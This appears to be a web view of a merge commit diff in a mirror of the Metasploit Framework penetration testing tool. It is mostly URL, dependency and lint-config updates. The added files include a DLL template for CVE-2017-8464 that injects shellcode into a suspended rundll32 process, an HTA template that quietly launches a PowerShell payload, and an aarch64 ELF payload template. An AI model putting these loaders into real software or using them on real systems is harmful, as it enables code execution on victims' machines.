infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'upstream-master' into feature/cisco-smi-scanner

bug/bundler_fix
Jon Hart 2017-08-22 14:39:44 -07:00
parent e52e9c147d 031f48725f
commit 2969da3d70
No known key found for this signature in database
GPG Key ID: 2FA9F0A3AFA8E9D3
3582 changed files with 12665 additions and 9835 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
.dockerignore
View File

@ -90,7 +90,7 @@ data/java
# Avoid checking in Meterpreter libs that are built from
# private source. If you're interested in this functionality,
# check out Metasploit Pro: http://metasploit.com/download
# check out Metasploit Pro: https://metasploit.com/download
data/meterpreter/ext_server_pivot.*.dll
# Avoid checking in metakitty, the source for

2
.gitignore vendored
View File

@ -78,7 +78,7 @@ data/java
# Avoid checking in Meterpreter libs that are built from
# private source. If you're interested in this functionality,
# check out Metasploit Pro: http://metasploit.com/download
# check out Metasploit Pro: https://metasploit.com/download
data/meterpreter/ext_server_pivot.*.dll
# Avoid checking in metakitty, the source for

41
.rubocop.yml
View File

@ -8,18 +8,57 @@
# inherit_from: .rubocop_todo.yml
AllCops:
TargetRubyVersion: 2.2
Metrics/ClassLength:
Description: 'Most Metasploit modules are quite large. This is ok.'
Enabled: true
Exclude:
- 'modules/**/*'
Metrics/AbcSize:
Enabled: false
Description: 'This is often a red-herring'
Metrics/CyclomaticComplexity:
Enabled: false
Description: 'This is often a red-herring'
Metrics/PerceivedComplexity:
Enabled: false
Description: 'This is often a red-herring'
Style/FrozenStringLiteralComment:
Enabled: false
Description: 'We cannot support this yet without a lot of things breaking'
Style/RedundantReturn:
Description: 'This often looks weird when mixed with actual returns, and hurts nothing'
Enabled: false
Style/Documentation:
Enabled: true
Description: 'Most Metasploit modules do not have class documentation.'
Exclude:
- 'modules/**/*'
Layout/IndentHeredoc:
Enabled: false
Description: 'We need to leave this disabled for Ruby 2.2 compat, remove in 2018'
Style/GuardClause:
Enabled: false
Description: 'This often introduces bugs in tested code'
Style/NegatedIf:
Enabled: false
Description: 'This often introduces bugs in tested code'
Style/ConditionalAssignment:
Enabled: false
Description: 'This is confusing for folks coming from other languages'
Style/Encoding:
Enabled: true
Description: 'We prefer binary to UTF-8.'
@ -53,7 +92,7 @@ Style/NumericLiterals:
Enabled: false
Description: 'This often hurts readability for exploit-ish code.'
Style/SpaceInsideBrackets:
Layout/SpaceInsideBrackets:
Enabled: false
Description: 'Until module template are final, most modules will fail this.'

2
.travis.yml
View File

@ -16,8 +16,6 @@ rvm:
- '2.4.1'
env:
# TODO: restore these tests when the code passes them!
# - CMD='bundle exec rake cucumber cucumber:boot CREATE_BINSTUBS=true'
- CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content"'
- CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag ~content"'

2
CONTRIBUTING.md
View File

@ -119,4 +119,4 @@ already way ahead of the curve, so keep it up!
[YARD]:http://yardoc.org
[Issues]:https://github.com/rapid7/metasploit-framework/issues
[Freenode IRC channel]:http://webchat.freenode.net/?channels=%23metasploit&uio=d4
[metasploit-hackers]:https://lists.sourceforge.net/lists/listinfo/metasploit-hackers
[metasploit-hackers]:https://groups.google.com/forum/#!forum/metasploit-hackers

12
Gemfile
View File

@ -18,9 +18,9 @@ group :development do
gem 'pry'
# module documentation
gem 'octokit'
# metasploit-aggregator as a framework only option for now
# Metasploit::Aggregator external session proxy
gem 'metasploit-aggregator'
# Disabled for now for crypttlv updates
# gem 'metasploit-aggregator'
end
group :development, :test do
@ -37,14 +37,6 @@ group :development, :test do
end
group :test do
# cucumber extension for testing command line applications, like msfconsole
gem 'aruba'
# cucumber + automatic database cleaning with database_cleaner
gem 'cucumber-rails', :require => false
gem 'shoulda-matchers'
# Manipulate Time.now in specs
gem 'timecop'
# Needed to work around a regression between capybara 2.7.1 and xpath 2.1
# XXX remove when capybara is updated to work with xpath 2.1
gem 'xpath', '2.0'
end

125
Gemfile.lock
View File

@ -1,12 +1,13 @@
PATH
remote: .
specs:
metasploit-framework (4.15.0)
metasploit-framework (4.16.0)
actionpack (~> 4.2.6)
activerecord (~> 4.2.6)
activesupport (~> 4.2.6)
backports
bcrypt
bcrypt_pbkdf
bit-struct
dnsruby
filesize
@ -16,9 +17,9 @@ PATH
metasploit-concern
metasploit-credential
metasploit-model
metasploit-payloads (= 1.2.37)
metasploit-payloads (= 1.3.1)
metasploit_data_models
metasploit_payloads-mettle (= 0.1.10)
metasploit_payloads-mettle (= 0.2.0)
msgpack
nessus_rest
net-ssh
@ -35,6 +36,8 @@ PATH
pg (= 0.20.0)
railties
rb-readline
rbnacl (< 5.0.0)
rbnacl-libsodium
recog
redcarpet
rex-arch
@ -46,7 +49,7 @@ PATH
rex-mime
rex-nop
rex-ole
rex-powershell
rex-powershell (< 0.1.73)
rex-random_identifier
rex-registry
rex-rop_builder
@ -102,48 +105,15 @@ GEM
arel (6.0.4)
arel-helpers (2.4.0)
activerecord (>= 3.1.0, < 6)
aruba (0.14.2)
childprocess (~> 0.5.6)
contracts (~> 0.9)
cucumber (>= 1.3.19)
ffi (~> 1.9.10)
rspec-expectations (>= 2.99)
thor (~> 0.19)
backports (3.8.0)
bcrypt (3.1.11)
bcrypt_pbkdf (1.0.0)
bindata (2.4.0)
bit-struct (0.16)
builder (3.2.3)
capybara (2.14.4)
addressable
mime-types (>= 1.16)
nokogiri (>= 1.3.3)
rack (>= 1.0.0)
rack-test (>= 0.5.4)
xpath (~> 2.0)
childprocess (0.5.9)
ffi (~> 1.0, >= 1.0.11)
coderay (1.1.1)
contracts (0.16.0)
cucumber (2.4.0)
builder (>= 2.1.2)
cucumber-core (~> 1.5.0)
cucumber-wire (~> 0.0.1)
diff-lcs (>= 1.1.3)
gherkin (~> 4.0)
multi_json (>= 1.7.5, < 2.0)
multi_test (>= 0.1.2)
cucumber-core (1.5.0)
gherkin (~> 4.0)
cucumber-rails (1.5.0)
capybara (>= 1.1.2, < 3)
cucumber (>= 1.3.8, < 4)
mime-types (>= 1.17, < 4)
nokogiri (~> 1.5)
railties (>= 4, < 5.2)
cucumber-wire (0.0.1)
diff-lcs (1.3)
dnsruby (1.60.1)
dnsruby (1.60.2)
docile (1.1.5)
erubis (2.7.0)
factory_girl (4.8.0)
@ -151,46 +121,24 @@ GEM
factory_girl_rails (4.8.0)
factory_girl (~> 4.8.0)
railties (>= 3.0.0)
faraday (0.12.1)
faraday (0.13.1)
multipart-post (>= 1.2, < 3)
ffi (1.9.18)
filesize (0.1.1)
fivemat (1.3.5)
gherkin (4.1.3)
google-protobuf (3.3.0)
googleauth (0.5.1)
faraday (~> 0.9)
jwt (~> 1.4)
logging (~> 2.0)
memoist (~> 0.12)
multi_json (~> 1.11)
os (~> 0.9)
signet (~> 0.7)
grpc (1.4.1)
google-protobuf (~> 3.1)
googleauth (~> 0.5.1)
hashery (2.1.2)
i18n (0.8.6)
jsobfu (0.4.2)
rkelly-remix
json (2.1.0)
jwt (1.5.6)
little-plugger (1.1.4)
logging (2.2.2)
little-plugger (~> 1.1)
multi_json (~> 1.10)
loofah (2.0.3)
nokogiri (>= 1.5.9)
memoist (0.16.0)
metasm (1.0.3)
metasploit-aggregator (0.2.1)
grpc
rex-arch
metasploit-concern (2.0.5)
activemodel (~> 4.2.6)
activesupport (~> 4.2.6)
railties (~> 4.2.6)
metasploit-credential (2.0.10)
metasploit-credential (2.0.12)
metasploit-concern
metasploit-model
metasploit_data_models
@ -203,7 +151,7 @@ GEM
activemodel (~> 4.2.6)
activesupport (~> 4.2.6)
railties (~> 4.2.6)
metasploit-payloads (1.2.37)
metasploit-payloads (1.3.1)
metasploit_data_models (2.0.15)
activerecord (~> 4.2.6)
activesupport (~> 4.2.6)
@ -214,28 +162,22 @@ GEM
postgres_ext
railties (~> 4.2.6)
recog (~> 2.0)
metasploit_payloads-mettle (0.1.10)
metasploit_payloads-mettle (0.2.0)
method_source (0.8.2)
mime-types (3.1)
mime-types-data (~> 3.2015)
mime-types-data (3.2016.0521)
mini_portile2 (2.2.0)
minitest (5.10.2)
minitest (5.10.3)
msgpack (1.1.0)
multi_json (1.12.1)
multi_test (0.1.2)
multipart-post (2.0.0)
nessus_rest (0.1.6)
net-ssh (4.1.0)
network_interface (0.0.1)
nexpose (6.1.0)
nexpose (6.1.1)
nokogiri (1.8.0)
mini_portile2 (~> 2.2.0)
octokit (4.7.0)
sawyer (~> 0.8.0, >= 0.5.3)
openssl-ccm (1.2.1)
openvas-omp (0.0.4)
os (0.9.6)
packetfu (1.1.13)
pcaprub
patch_finder (1.0.2)
@ -274,11 +216,15 @@ GEM
rake (>= 0.8.7)
thor (>= 0.18.1, < 2.0)
rake (12.0.0)
rb-readline (0.5.4)
rb-readline (0.5.5)
rbnacl (4.0.2)
ffi
rbnacl-libsodium (1.0.13)
rbnacl (>= 3.0.1)
recog (2.1.11)
nokogiri
redcarpet (3.4.0)
rex-arch (0.1.9)
rex-arch (0.1.11)
rex-text
rex-bin_tools (0.1.4)
metasm
@ -286,7 +232,7 @@ GEM
rex-core
rex-struct2
rex-text
rex-core (0.1.11)
rex-core (0.1.12)
rex-encoder (0.1.4)
metasm
rex-arch
@ -316,7 +262,8 @@ GEM
rex-text
rex-socket (0.1.8)
rex-core
rex-sslscan (0.1.4)
rex-sslscan (0.1.5)
rex-core
rex-socket
rex-text
rex-struct2 (0.1.2)
@ -337,7 +284,7 @@ GEM
rspec-mocks (3.6.0)
diff-lcs (>= 1.2.0, < 2.0)
rspec-support (~> 3.6.0)
rspec-rails (3.6.0)
rspec-rails (3.6.1)
actionpack (>= 3.0)
activesupport (>= 3.0)
railties (>= 3.0)
@ -358,22 +305,15 @@ GEM
sawyer (0.8.1)
addressable (>= 2.3.5, < 2.6)
faraday (~> 0.8, < 1.0)
shoulda-matchers (3.1.1)
activesupport (>= 4.0.0)
signet (0.7.3)
addressable (~> 2.3)
faraday (~> 0.9)
jwt (~> 1.5)
multi_json (~> 1.10)
simplecov (0.14.1)
simplecov (0.15.0)
docile (~> 1.1.0)
json (>= 1.8, < 3)
simplecov-html (~> 0.10.0)
simplecov-html (0.10.1)
simplecov-html (0.10.2)
slop (3.6.0)
sqlite3 (1.3.13)
sshkey (1.9.0)
thor (0.19.4)
thor (0.20.0)
thread_safe (0.3.6)
timecop (0.9.1)
ttfunk (1.5.1)
@ -386,19 +326,14 @@ GEM
activemodel (>= 4.2.7)
activesupport (>= 4.2.7)
xmlrpc (0.3.0)
xpath (2.0.0)
nokogiri (~> 1.3)
yard (0.9.9)
PLATFORMS
ruby
DEPENDENCIES
aruba
cucumber-rails
factory_girl_rails
fivemat
metasploit-aggregator
metasploit-framework!
octokit
pry
@ -406,11 +341,9 @@ DEPENDENCIES
redcarpet
rspec-rails
rspec-rerun
shoulda-matchers
simplecov
timecop
xpath (= 2.0)
yard
BUNDLED WITH
1.15.1
1.15.4

79
LICENSE_GEMS
View File

@ -1,71 +1,62 @@
This file is auto-generated by tools/dev/update_gem_licenses.sh
actionpack, 4.2.8, MIT
actionview, 4.2.8, MIT
activemodel, 4.2.8, MIT
activerecord, 4.2.8, MIT
activesupport, 4.2.8, MIT
Ascii85, 1.0.2, MIT
actionpack, 4.2.9, MIT
actionview, 4.2.9, MIT
activemodel, 4.2.9, MIT
activerecord, 4.2.9, MIT
activesupport, 4.2.9, MIT
addressable, 2.5.1, "Apache 2.0"
afm, 0.2.2, MIT
arel, 6.0.4, MIT
arel-helpers, 2.4.0, unknown
aruba, 0.14.2, MIT
backports, 3.8.0, MIT
bcrypt, 3.1.11, MIT
bindata, 2.4.0, ruby
bit-struct, 0.16, ruby
builder, 3.2.3, MIT
bundler, 1.15.0, MIT
capybara, 2.14.0, MIT
childprocess, 0.5.9, MIT
bundler, 1.15.1, MIT
coderay, 1.1.1, MIT
contracts, 0.16.0, "Simplified BSD"
cucumber, 2.4.0, MIT
cucumber-core, 1.5.0, MIT
cucumber-rails, 1.5.0, MIT
cucumber-wire, 0.0.1, MIT
diff-lcs, 1.3, "MIT, Artistic-2.0, GPL-2.0+"
dnsruby, 1.60.1, "Apache 2.0"
docile, 1.1.5, MIT
erubis, 2.7.0, MIT
factory_girl, 4.8.0, MIT
factory_girl_rails, 4.8.0, MIT
faraday, 0.12.1, MIT
ffi, 1.9.18, "New BSD"
filesize, 0.1.1, MIT
fivemat, 1.3.3, MIT
gherkin, 4.1.3, MIT
fivemat, 1.3.5, MIT
google-protobuf, 3.3.0, "New BSD"
googleauth, 0.5.1, "Apache 2.0"
grpc, 1.3.4, "New BSD"
i18n, 0.8.1, MIT
grpc, 1.4.1, "New BSD"
hashery, 2.1.2, "Simplified BSD"
i18n, 0.8.6, MIT
jsobfu, 0.4.2, "New BSD"
json, 2.1.0, ruby
jwt, 1.5.6, MIT
little-plugger, 1.1.4, MIT
logging, 2.2.2, MIT
loofah, 2.0.3, MIT
memoist, 0.15.0, MIT
memoist, 0.16.0, MIT
metasm, 1.0.3, LGPL
metasploit-aggregator, 0.2.1, "New BSD"
metasploit-concern, 2.0.4, "New BSD"
metasploit-credential, 2.0.9, "New BSD"
metasploit-framework, 4.14.23, "New BSD"
metasploit-concern, 2.0.5, "New BSD"
metasploit-credential, 2.0.10, "New BSD"
metasploit-framework, 4.15.0, "New BSD"
metasploit-model, 2.0.4, "New BSD"
metasploit-payloads, 1.2.29, "3-clause (or ""modified"") BSD"
metasploit_data_models, 2.0.14, "New BSD"
metasploit_payloads-mettle, 0.1.9, "3-clause (or ""modified"") BSD"
metasploit-payloads, 1.2.37, "3-clause (or ""modified"") BSD"
metasploit_data_models, 2.0.15, "New BSD"
metasploit_payloads-mettle, 0.1.10, "3-clause (or ""modified"") BSD"
method_source, 0.8.2, MIT
mime-types, 3.1, MIT
mime-types-data, 3.2016.0521, MIT
mini_portile2, 2.1.0, MIT
mini_portile2, 2.2.0, MIT
minitest, 5.10.2, MIT
msgpack, 1.1.0, "Apache 2.0"
multi_json, 1.12.1, MIT
multi_test, 0.1.2, MIT
multipart-post, 2.0.0, MIT
nessus_rest, 0.1.6, MIT
net-ssh, 4.1.0, MIT
network_interface, 0.0.1, MIT
nexpose, 6.0.0, BSD
nokogiri, 1.7.2, MIT
nexpose, 6.1.0, BSD
nokogiri, 1.8.0, MIT
octokit, 4.7.0, MIT
openssl-ccm, 1.2.1, MIT
openvas-omp, 0.0.4, MIT
@ -73,6 +64,7 @@ os, 0.9.6, MIT
packetfu, 1.1.13, BSD
patch_finder, 1.0.2, "New BSD"
pcaprub, 0.12.4, LGPL-2.1
pdf-reader, 2.0.0, MIT
pg, 0.20.0, "New BSD"
pg_array_parser, 0.0.9, unknown
postgres_ext, 3.0.0, MIT
@ -83,14 +75,14 @@ rack-test, 0.6.3, MIT
rails-deprecated_sanitizer, 1.0.3, MIT
rails-dom-testing, 1.0.8, MIT
rails-html-sanitizer, 1.0.3, MIT
railties, 4.2.8, MIT
railties, 4.2.9, MIT
rake, 12.0.0, MIT
rb-readline, 0.5.4, BSD
recog, 2.1.8, unknown
recog, 2.1.11, unknown
redcarpet, 3.4.0, MIT
rex-arch, 0.1.4, "New BSD"
rex-bin_tools, 0.1.3, "New BSD"
rex-core, 0.1.10, "New BSD"
rex-arch, 0.1.9, "New BSD"
rex-bin_tools, 0.1.4, "New BSD"
rex-core, 0.1.11, "New BSD"
rex-encoder, 0.1.4, "New BSD"
rex-exploitation, 0.1.14, "New BSD"
rex-java, 0.1.5, "New BSD"
@ -101,23 +93,25 @@ rex-powershell, 0.1.72, "New BSD"
rex-random_identifier, 0.1.2, "New BSD"
rex-registry, 0.1.3, "New BSD"
rex-rop_builder, 0.1.3, "New BSD"
rex-socket, 0.1.6, "New BSD"
rex-socket, 0.1.8, "New BSD"
rex-sslscan, 0.1.4, "New BSD"
rex-struct2, 0.1.2, "New BSD"
rex-text, 0.2.15, "New BSD"
rex-zip, 0.1.3, "New BSD"
rkelly-remix, 0.0.7, MIT
robots, 0.10.1, MIT
rspec, 3.6.0, MIT
rspec-core, 3.6.0, MIT
rspec-expectations, 3.6.0, MIT
rspec-mocks, 3.6.0, MIT
rspec-rails, 3.6.0, MIT
rspec-rerun, 1.1.0, MIT
rspec-support, 3.6.0, MIT
ruby_smb, 0.0.17, "New BSD"
ruby-rc4, 0.1.5, MIT
ruby_smb, 0.0.18, "New BSD"
rubyntlm, 0.6.2, MIT
rubyzip, 1.2.1, "Simplified BSD"
sawyer, 0.8.1, MIT
shoulda-matchers, 3.1.1, MIT
signet, 0.7.3, "Apache 2.0"
simplecov, 0.14.1, MIT
simplecov-html, 0.10.1, MIT
@ -126,10 +120,11 @@ sqlite3, 1.3.13, "New BSD"
sshkey, 1.9.0, MIT
thor, 0.19.4, MIT
thread_safe, 0.3.6, "Apache 2.0"
timecop, 0.8.1, MIT
timecop, 0.9.1, MIT
ttfunk, 1.5.1, "Nonstandard, GPL-2.0, GPL-3.0"
tzinfo, 1.2.3, MIT
tzinfo-data, 1.2017.2, MIT
windows_error, 0.1.2, BSD
xdr, 2.0.0, "Apache 2.0"
xmlrpc, 0.3.0, ruby
xpath, 2.1.0, MIT
yard, 0.9.9, MIT

5
README.md
View File

@ -14,13 +14,12 @@ New bugs and feature requests should be directed to:
API documentation for writing modules can be found at:
https://rapid7.github.io/metasploit-framework/api
Questions and suggestions can be sent to:
https://lists.sourceforge.net/lists/listinfo/metasploit-hackers
Questions and suggestions can be sent to: Freenode IRC channel or e-mail the metasploit-hackers mailing list
Installing
--
Generally, you should use [the free installer](https://www.metasploit.com/download),
Generally, you should use [the free installer](https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers),
which contains all of the dependencies and will get you up and running with a
few clicks. See the [Dev Environment Setup](https://r-7.co/MSF-DEV) if
you'd like to deal with dependencies on your own.

16
data/exploits/cve-2017-8464/src/build.sh Executable file
View File

@ -0,0 +1,16 @@
#!/bin/sh
rm -f *.o *.dll
CCx86="i686-w64-mingw32"
CCx64="x86_64-w64-mingw32"
${CCx64}-gcc -m64 -c -Os template.c -Wall -shared
${CCx64}-dllwrap -m64 --def template.def *.o -o temp.dll
${CCx64}-strip -s temp.dll -o template_x64_windows.dll
rm -f temp.dll *.o
${CCx86}-gcc -c -Os template.c -Wall -shared
${CCx86}-dllwrap --def template.def *.o -o temp.dll
${CCx86}-strip -s temp.dll -o template_x86_windows.dll
rm -f temp.dll *.o

95
data/exploits/cve-2017-8464/src/template.c Executable file
View File

@ -0,0 +1,95 @@
// Based on https://github.com/rapid7/metasploit-framework/tree/cac890a797d0d770260074dfe703eb5cfb63bd46/data/templates/src/pe/dll
// - removed ExitThread(0) to prevent an Explorer crash
// - added Mutex to prevent invoking payload multiple times (at least try)
#include <windows.h>
#include "template.h"
void inline_bzero(void *p, size_t l)
{
BYTE *q = (BYTE *)p;
size_t x = 0;
for (x = 0; x < l; x++)
*(q++) = 0x00;
}
void ExecutePayload(void);
BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved)
{
switch (dwReason)
{
case DLL_PROCESS_ATTACH:
ExecutePayload();
break;
case DLL_PROCESS_DETACH:
break;
case DLL_THREAD_ATTACH:
break;
case DLL_THREAD_DETACH:
break;
}
return TRUE;
}
void ExecutePayload(void)
{
PROCESS_INFORMATION pi;
STARTUPINFO si;
CONTEXT ctx;
LPVOID ep;
HANDLE hMutex;
SECURITY_ATTRIBUTES MutexAttributes;
inline_bzero(&MutexAttributes, sizeof(MutexAttributes));
MutexAttributes.nLength = sizeof(MutexAttributes);
MutexAttributes.bInheritHandle = TRUE; // inherit the handle
hMutex = CreateMutex(&MutexAttributes, TRUE, "MsfMutex");
if(hMutex == NULL)
{
return;
}
if(GetLastError() == ERROR_ALREADY_EXISTS)
{
CloseHandle(hMutex);
return;
}
if(GetLastError() == ERROR_ACCESS_DENIED)
{
CloseHandle(hMutex);
return;
}
// Start up the payload in a new process
inline_bzero(&si, sizeof(si));
si.cb = sizeof(si);
// Create a suspended process, write shellcode into stack, make stack RWX, resume it
if(CreateProcess(NULL, "rundll32.exe", NULL, NULL, TRUE, CREATE_SUSPENDED|IDLE_PRIORITY_CLASS, NULL, NULL, &si, &pi)) {
ctx.ContextFlags = CONTEXT_INTEGER|CONTEXT_CONTROL;
GetThreadContext(pi.hThread, &ctx);
ep = (LPVOID)VirtualAllocEx(pi.hProcess, NULL, SCSIZE, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(pi.hProcess,(PVOID)ep, &code, SCSIZE, 0);
#ifdef _WIN64
ctx.Rip = (DWORD64)ep;
#else
ctx.Eip = (DWORD)ep;
#endif
SetThreadContext(pi.hThread, &ctx);
ResumeThread(pi.hThread);
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
}
CloseHandle(hMutex);
}

3
data/exploits/cve-2017-8464/src/template.def Normal file
View File

@ -0,0 +1,3 @@
EXPORTS
DllMain@12

3
data/exploits/cve-2017-8464/src/template.h Normal file
View File

@ -0,0 +1,3 @@
#define SCSIZE 2048
unsigned char code[SCSIZE] = "PAYLOAD:";

18
data/exploits/cve-2017-8464/src/template.rc Normal file
View File

@ -0,0 +1,18 @@
LANGUAGE 9, 1
VS_VERSION_INFO VERSIONINFO
FILEVERSION 0,0,0,1
PRODUCTVERSION 0,0,0,1
FILEFLAGSMASK 0x17L
FILEFLAGS 0x0L
FILEOS 0x4L
FILETYPE 0x2L
FILESUBTYPE 0x0L
BEGIN
END
#define RT_HTML 23

BIN
data/exploits/cve-2017-8464/template_x64_windows.dll Executable file
View File

Binary file not shown.

BIN
data/exploits/cve-2017-8464/template_x86_windows.dll Executable file
View File

Binary file not shown.

2
data/exploits/psnuffle/smb.rb
View File

@ -88,7 +88,7 @@ class SnifferSMB < BaseProtocolParser
return "NTLMv1"
end
else
raise RuntimeError, "Unknow hash type"
raise RuntimeError, "Unknown hash type"
end
end

2
data/logos/3kom-superhack.txt
View File

@ -15,5 +15,5 @@
| %bld[ OK ]%clr |
|______________________________________________________________________________|
| |
| http://metasploit.com |
| https://metasploit.com |
|______________________________________________________________________________|%clr

2
data/logos/metasploit-shield.txt
View File

@ -18,4 +18,4 @@
%bluMMMMMMMMMMNm,%clr %blueMMMMMNMMNMM%clr
%bluMMMMNNMNMMMMMNx%clr %bluMMMMMMNMMNMMNM%clr
%bluMMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM%clr
%clr%bld http://metasploit.com
%clr%bld https://metasploit.com

2
data/logos/missile-command.txt
View File

@ -27,4 +27,4 @@
################################################################################
# %bldWAVE 4%clr ######## %bldSCORE 31337%clr ################################## %bldHIGH FFFFFFFF%clr #
################################################################################
http://metasploit.com%clr
https://metasploit.com%clr

2
data/logos/ninja.txt
View File

@ -27,4 +27,4 @@
# # ### # # ##
########################
## ## ## ##
http://metasploit.com%clr
https://metasploit.com%clr

2
data/logos/r7-metasploit.txt
View File

@ -1,7 +1,7 @@
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %% %%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% % %%%%%%%% %%%%%%%%%%% http://metasploit.com %%%%%%%%%%%%%%%%%%%%%%%%%
%% % %%%%%%%% %%%%%%%%%%% https://metasploit.com %%%%%%%%%%%%%%%%%%%%%%%%%
%% %% %%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

2
data/logos/wake-up-neo.txt
View File

@ -23,4 +23,4 @@
; ,''-,;' ``-
``-..__``--`
http://metasploit.com%clr
https://metasploit.com%clr

2
data/msfcrawler/basic.rb
View File

@ -1,5 +1,5 @@
##
# This module requires Metasploit: http://metasploit.com/download
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

2
data/msfcrawler/comments.rb
View File

@ -1,5 +1,5 @@
##
# This module requires Metasploit: http://metasploit.com/download
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

2
data/msfcrawler/forms.rb
View File

@ -1,5 +1,5 @@
##
# This module requires Metasploit: http://metasploit.com/download
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

2
data/msfcrawler/frames.rb
View File

@ -1,5 +1,5 @@
##
# This module requires Metasploit: http://metasploit.com/download
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

2
data/msfcrawler/image.rb
View File

@ -1,5 +1,5 @@
##
# This module requires Metasploit: http://metasploit.com/download
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

2
data/msfcrawler/link.rb
View File

@ -1,5 +1,5 @@
##
# This module requires Metasploit: http://metasploit.com/download
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

2
data/msfcrawler/objects.rb
View File

@ -1,5 +1,5 @@
##
# This module requires Metasploit: http://metasploit.com/download
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

2
data/msfcrawler/scripts.rb
View File

@ -1,5 +1,5 @@
##
# This module requires Metasploit: http://metasploit.com/download
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

12
data/templates/scripts/to_powershell.hta.template
View File

@ -1,8 +1,12 @@
<script language="VBScript">
Set %{var_shell} = CreateObject("Wscript.Shell")
window.moveTo -4000, -4000
Set %{var_shell} = CreateObject("Wscript.Shell")
Set %{var_fso} = CreateObject("Scripting.FileSystemObject")
If %{var_fso}.FileExists(%{var_shell}.ExpandEnvironmentStrings("%%PSModulePath%%") + "..\powershell.exe") Then
%{var_shell}.Run "%{powershell}",0
End If
For each path in Split(%{var_shell}.ExpandEnvironmentStrings("%%PSModulePath%%"),";")
If %{var_fso}.FileExists(path + "\..\powershell.exe") Then
%{var_shell}.Run "%{powershell}",0
Exit For
End If
Next
window.close()
</script>

41
data/templates/src/elf/exe/elf_aarch64_template.s Executable file
View File

@ -0,0 +1,41 @@
; build with:
; nasm elf_aarch64_template.s -f bin -o template_aarch64_linux.bin
BITS 64
org 0
ehdr: ; Elf32_Ehdr
db 0x7F, "ELF", 2, 1, 1, 0 ; e_ident
db 0, 0, 0, 0, 0, 0, 0, 0 ;
dw 2 ; e_type = ET_EXEC for an executable
dw 0xB7 ; e_machine = AARCH64
dd 0 ; e_version
dq _start ; e_entry
dq phdr - $$ ; e_phoff
dq 0 ; e_shoff
dd 0 ; e_flags
dw ehdrsize ; e_ehsize
dw phdrsize ; e_phentsize
dw 1 ; e_phnum
dw 0 ; e_shentsize
dw 0 ; e_shnum
dw 0 ; e_shstrndx
ehdrsize equ $ - ehdr
phdr: ; Elf32_Phdr
dd 1 ; p_type = PT_LOAD
dd 7 ; p_flags = rwx
dq 0 ; p_offset
dq $$ ; p_vaddr
dq $$ ; p_paddr
dq 0xDEADBEEF ; p_filesz
dq 0xDEADBEEF ; p_memsz
dq 0x1000 ; p_align
phdrsize equ $ - phdr
global _start
_start:

BIN
data/templates/template_aarch64_linux.bin Normal file
View File

Binary file not shown.

2
data/webcam/answerer.html
View File

@ -188,7 +188,7 @@
</div>
</div>
<div class="footer">
<center><a href="http://metasploit.com/" target="_blank">metasploit.com</a></center>
<center><a href="https://metasploit.com/" target="_blank">metasploit.com</a></center>
</div>
</body>
</html>

2
data/webcam/offerer.html
View File

@ -195,7 +195,7 @@
</div>
<div class="footer">
<center><a href="http://metasploit.com/" target="_blank">metasploit.com</a></center>
<center><a href="https://metasploit.com/" target="_blank">metasploit.com</a></center>
</div>
</body>

3
docker/Dockerfile
View File

@ -24,7 +24,6 @@ RUN apk update && \
bison \
build-base \
ruby-dev \
libffi-dev\
openssl-dev \
readline-dev \
sqlite-dev \
@ -35,7 +34,9 @@ RUN apk update && \
yaml-dev \
zlib-dev \
ncurses-dev \
git \
&& echo "gem: --no-ri --no-rdoc" > /etc/gemrc \
&& gem install bundler \
&& bundle install --system $BUNDLER_ARGS \
&& apk del .ruby-builddeps \
&& rm -rf /var/cache/apk/*

4
docker/bin/msfvenom
View File

@ -17,5 +17,9 @@ if [[ -z "$MSF_PATH" ]]; then
MSF_PATH=$(dirname $(dirname $path))
fi
if [[ -n "$MSF_BUILD" ]]; then
docker-compose -f $MSF_PATH/docker-compose.yml build
fi
cd $MSF_PATH
docker-compose run --rm --service-ports ms ./msfvenom "$@"

26
docker/bin/msfvenom-dev Executable file
View File

@ -0,0 +1,26 @@
#! /bin/bash
if [[ -z "$MSF_PATH" ]]; then
path=`dirname $0`
# check for ./docker/msfconsole.rc
if [[ ! -f $path/../msfconsole.rc ]] ; then
# we are not inside the project
realpath --version > /dev/null 2>&1 || { echo >&2 "I couldn't find where metasploit is. Set \$MSF_PATH or execute this from the project root"; exit 1 ;}
# determine script path
pushd $(dirname $(realpath $0)) > /dev/null
path=$(pwd)
popd > /dev/null
fi
MSF_PATH=$(dirname $(dirname $path))
fi
cd $MSF_PATH
if [[ -n "$MSF_BUILD" ]]; then
